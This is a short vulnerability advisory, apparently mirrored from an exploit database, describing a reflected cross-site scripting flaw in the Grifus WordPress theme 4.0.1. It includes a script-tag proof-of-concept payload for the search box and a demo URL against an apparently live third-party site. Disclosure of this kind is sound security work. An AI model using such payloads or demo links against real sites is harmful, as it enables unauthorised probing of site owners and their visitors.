Lucene search
K

WordPress Grifus 4.0.1 Cross Site Scripting Vulnerability

🗓️ 21 Dec 2017 00:00:00Reported by Sajibe KantiType 
zdt
 zdt
🔗 0day.today👁 30 Views

Grifus WordPress theme 4.0.1 Cross Site Scripting vulnerabilit

Code
======
Title: Grifus WordPress  Themes  XSS Vuln
Version: 4.0.1
Homepage: https://mundothemes.com/grifus/
=======

Description
================
Grifus WordPress theme  For movies Web

POC:
========
1. Go To Terget Web
2. Click Search box
3. Now Give This Payload in Search box "
<script>prompt(document.domain)</script>
"
4. Now See xss Will be Exclude

 Demo:
 ======
 http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.
domain%29%3C%2Fscript%3E

Mitigations
================
Update Your Themes



-- 
Thanks
Sajibe Kanti
 Independent Web Security Researcher <https://twitter.com/Sajibekantibd>

#  0day.today [2017-12-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

21 Dec 2017 00:00Current
7.1High risk
Vulners AI Score7.1
30